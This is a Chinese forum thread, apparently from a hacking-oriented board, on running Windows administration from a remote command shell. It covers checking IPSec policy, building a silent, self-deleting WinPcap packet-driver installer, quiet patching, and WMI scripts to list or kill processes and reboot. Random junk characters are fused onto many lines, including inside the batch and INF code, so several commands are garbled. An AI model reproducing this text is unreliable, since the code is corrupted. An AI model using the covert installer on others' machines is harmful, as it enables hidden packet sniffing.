7 F4 {& p& k- x3 s( b0 Z. k3 n最后说一下查看IPSec策略的办法。
' n& A& O! r- B) C对于XP很简单，一条命令搞定——ipseccmd show filters
7 N8 E9 R- `5 M5 [3 g而ipsecpol没有查询的功能。需要再用一个命令行工具netdiag。它位于2000系统安装盘的SUPPORT\TOOLS\SUPPORT.CAB中。（已经上传了三个文件，也就不在乎多一个了。^_^）
. a$ ?* t! i: C: \: J5 u( g
netdiag需要RemoteRegistry服务的支持。所以先启动该服务：
* R! k! f. r  t9 j: l- c" e
. ^4 D2 m$ m5 {! L: N% znet start remoteregistry
1 }+ a# N( K' x* f) `
不启动RemoteRegistry就会得到一个错误：

[FATAL] Failed to get system information of this machine.
3 u* `* M& B# H( A% R1 w# P1 u3 x
/ X! p: ?1 M& B5 n( Vnetdiag这个工具功能十分强大，与网络有关的信息都可以获取！不过，输出的信息有时过于详细，超过命令行控制台cmd.exe的输出缓存，而不是每个远程cmd shell都可以用more命令来分页的。

查看ipsec策略的命令是：
netdiag /debug /test:ipsec
% u& s6 Z- z- I1 s
然后是一长串输出信息。IPSec策略位于最后。

韩冰

安装
一个软件/工具的安装过程，一般来说只是做两件事：拷贝文件到特定目录和修改注册表。只要搞清楚具体的内容，那么就可以自己在命令行下实现了。（不考虑安装后需要注册激活等情况）

9 l8 K8 l7 ~4 }, bWinPcap是个很常用的工具，但必须在窗口界面下安装。在网上也可以找到不用GUI的版本（但还是有版权页），其实我们完全可以自己做一个。

以WinPcap 3.0a 为例。通过比较安装前后的文件系统和注册表快照，很容易了解整个安装过程。
除去反安装的部分，关键的文件有三个：wpcap.dll，packet.dll和npf.sys。前面两个文件位于system32目录下，第三个在system32\drivers下。而注册表的变化是增加了一个系统服务NPF。注意，是系统服务（即驱动）不是Win32服务。

  O. ]; \) _7 O9 c2 ]作为系统服务，不但要在HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services下增加主键，在HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root下也增加主键。而后者默认只有SYSTEM身份才可以修改。幸运的是，并不需要手动添加它，winpcap被调用时会自动搞定。甚至完全不用手动修改注册表，所有的事winpcap都会自己完成，只需要将三个文件复制到合适的位置就行了。

& x- B" ~7 P$ n2 b/ p9 b作为范例，还是演示一下如何修改注册表：利用前面说过的inf文件来实现。
6 [2 j9 N8 n/ Y( ^6 h
[Version]
0 z% v( y$ ?: U5 RSignature="$WINDOWS NT$"
. q( _2 a: p6 g9 E( f4 w3 @9 w[DefaultInstall.Services]
AddService=NPF,,winpcap_svr
9 s! G; i9 k+ V. F* Y[winpcap_svr]
DisplayName=Netgroup Packet Filter
ServiceType=0x1
2 X2 q+ j, k- y$ R8 R" HStartType=3
7 y. q. C" y- K' xErrorControl=1
8 A0 l  D& b" I; b# g( OServiceBinary=%12%\npf.sys

将上面这些内容保存为_wpcap_.inf文件。
再写一个批处理_wpcap_.bat：
* \2 A- a5 o- o; N% D
; u# |% d6 ?: X! y8 Irundll32.exe setupapi,InstallHinfSection DefaultInstall 128 %CD%\_wpcap_.inf
/ Q  t' p4 A! s; Z  P9 ^del _wpcap_.inf
8 h# I: c4 Y5 l: q6 Y1 V$ K  Y% ?: G) w& }if /i %CD%==%SYSTEMROOT%\system32 goto COPYDRV
copy packet.dll %SYSTEMROOT%\system32\
: K+ ^, |$ N3 wcopy wpcap.dll %SYSTEMROOT%\system32\
del packet.dll
- Z0 W' K. ?! ~& E$ R$ _del wpcap.dll
  L  f4 w9 P: ~:COPYDRV
if /i %CD%==%SYSTEMROOT%\system32\drivers goto END
copy npf.sys %SYSTEMROOT%\system32\drivers\
# W3 [3 h4 G$ M0 ^6 }$ j* L) rdel npf.sys
# ]+ K( o; z; v/ {/ y, @# k' B:END
3 n$ m0 X. B/ F- A; E* U% j5 Bdel %0

然后用winrar将所有文件（5个）打包为自解压的exe，并将『高级自解压选项』->『解压后运行』设置为_wpcap_.bat，命令行的winpcap安装包就制作完成了。

0 C# V* a9 R# w% f& L+ v' U! G1 [( n注意，批处理最后一行没有回车符。否则会因为正在运行而无法删除自己。

: Z+ u' x7 Y# F  J- u4 {所有的软件安装，基本上可以套用这个思路。但也有例外的，那就是系统补丁的安装。
由于系统补丁有可能要替换正在被执行或访问的文件，所以用copy命令是不行的。
0 a5 H* n* B0 l, M7 D* x6 }0 H幸好，Windows补丁包支持命令行安装。
$ @  g6 y5 B( @比如：

7 Y5 W- O! k- I! ]; t/ A2 `KB824146.exe -n -z -q
- D8 ^1 Z( z1 t& L
! t; S& ?+ S: Y, e% g-n 不保留备份
  n2 A+ P. E( U9 ]. F# ~. h* B-z 不重起
: v* d, G5 ?: b0 e% j$ z-q 安静模式
  L8 c: p$ R  M. N
! L" ^) F7 @2 B/ ]6 I如果有一堆补丁要打，那么用RAR打包成自解压文件，外加一个批处理。

/ Y+ Z8 [, T/ D: q0 ]$ ~for %%f in (KB??????.exe) do %%f -n -z -q
for %%f in (KB??????.exe) do del %%f
del %0
; `- _( q) V7 N1 v! b' l7 f5 J: _+ P

, c9 V; T: m: b! d! G" rWindows脚本
: R% ]. ^2 a0 m, [5 t& s% k很多事用脚本来做是很简洁的。下面给出几个常用脚本的echo版。
% p. q" {' F# n/ `# t3 x" q
1，显示系统版本
4 f1 h0 B  F  d; }3 i. u6 q0 v! k* V
% |- T' Q9 Y/ x4 k& @7 j& f@echo for each ps in getobject _ >ps.vbs
6 d5 Z/ E6 A* |# s@echo ("winmgmts:\\.\root\cimv2:win32_operatingsystem").instances_ >>ps.vbs
@echo wscript.echo ps.caption^&" "^&ps.version:next >>ps.vbs
cscript //nologo ps.vbs & del ps.vbs

8 ~# ~2 P; m+ `1 _- S( ~2，列举进程

@echo for each ps in getobject _ >ps.vbs
8 s$ X3 n# P# I@echo ("winmgmts:\\.\root\cimv2:win32_process").instances_ >>ps.vbs
@echo wscript.echo ps.handle^&vbtab^&ps.name^&vbtab^&ps.executablepath:next >>ps.vbs
cscript //nologo ps.vbs & del ps.vbs
* P' q) [- y# R0 A
( d, M* j( z# ]$ O* ^0 ?" N0 o3，终止进程

@echo for each ps in getobject _ >pk.vbs
@echo ("winmgmts:\\.\root\cimv2:win32_process").instances_ >>pk.vbs
@echo if ps.handle=wscript.arguments(0) then wscript.echo ps.terminate:end if:next >>pk.vbs
* B8 j( V$ K2 `1 B" I; Z
要终止PID为123的进程，使用如下语法：
+ c% [9 W0 x. S) y1 H5 X- }5 r- fcscript pk.vbs 123
. x  N# r4 O; H  h* d8 e# Y
如果显示一个0，表示终止成功。

* \. Z4 ^' Z: e8 C" O然后：
del pk.vbs
3 W. G% u0 A* E
4，重启系统
( _( _, Q* d  \) o$ K
+ r3 E* ^5 m9 H- l@echo for each os in getobject _ >rb.vbs
@echo ("winmgmts:{(shutdown)}!\\.\root\cimv2:win32_operatingsystem").instances_ >>rb.vbs
@echo os.win32shutdown(2):next >>rb.vbs & cscript //nologo rb.vbs & del rb.vbs
" c7 _! A- ~" q; ]' E, z
5 l% r3 G/ h1 X& f5，列举自启动的服务
9 ]- g0 K: l! c# C& G5 j
% ]; I8 r3 x4 L. N* D@echo for each sc in getobject("winmgmts:\\.\root\cimv2:win32_service").instances_ >sc.vbs
  }2 D* ]: r$ ~! ~4 u$ _@echo if sc.startmode="Auto" then wscript.echo sc.name^&" - "^&sc.pathname >>sc.vbs
@echo next >>sc.vbs & cscript //nologo sc.vbs & del sc.vbs
) K# @8 @+ x( T% v  j# e
6，列举正在运行的服务
" O% O: S9 T* W, ]
@echo for each sc in getobject("winmgmts:\\.\root\cimv2:win32_service").instances_ >sc.vbs
4 B1 W. a3 H" T. l; u! g! W: |@echo if sc.state="Running" then wscript.echo sc.name^&" - "^&sc.pathname >>sc.vbs
9 |$ X( |" X) ?, |@echo next >>sc.vbs & cscript //nologo sc.vbs & del sc.vbs
* e3 ]( t+ k) M; B4 s
* A' ~8 Q2 W, o2 z# {3 g7，显示系统最后一次启动的时间
# s9 K8 U3 O2 }  l* b
0 M/ y" f* z! E3 w9 E( ~$ v@echo for each os in getobject _ >bt.vbs
( ?' B, S' u1 G  d; b" v@echo ("winmgmts:\\.\root\cimv2:win32_operatingsystem").instances_ >>bt.vbs
@echo wscript.echo os.lastbootuptime:next >>bt.vbs & cscript //nologo bt.vbs & del bt.vbs

显示结果的格式是：
* |: C; `: K" PyyyymmddHHMMSSxxxxxxZZZZ
5 ?5 l+ C5 {3 P( _+ P) R$ f_年_月日时分秒_微秒_时区

8，显示系统运行时间

0 [& w$ A1 e) A" W1 I. h+ q@echo for each os in getobject _ >rt.vbs
& N5 I# y# b0 U) a& e" {@echo ("winmgmts:\\.\root\cimv2:win32_perfrawdata_perfos_system").instances_ >>rt.vbs
@echo s=os.timestamp_sys100ns:l=len(s):s=left(s,l-7):for i=1 to l-7 >>rt.vbs
* J+ S4 w8 n/ k@echo t=t^&mid(s,i,1):d=t\86400:r=r^&d:t=t mod 86400:next >>rt.vbs
1 B4 A0 d/ x7 m, E: o@echo wscript.echo cint(r)^&"d "^&t\3600^&"h "^&t\60 mod 60^&"m "^&t mod 60^&"s":next >>rt.vbs
cscript //nologo rt.vbs & del rt.vbs
" ?+ v9 R' l: Z- ?( @2 r, V, k. d
这个运行时间是从性能计数器中获得的64位整型数，不会出现在49.7天后溢出的情况。

juneshumo

太好了…………感激不尽…………

iTonyDou

有学了不少东西，呵呵，谢谢楼主了！！！！！！！！！！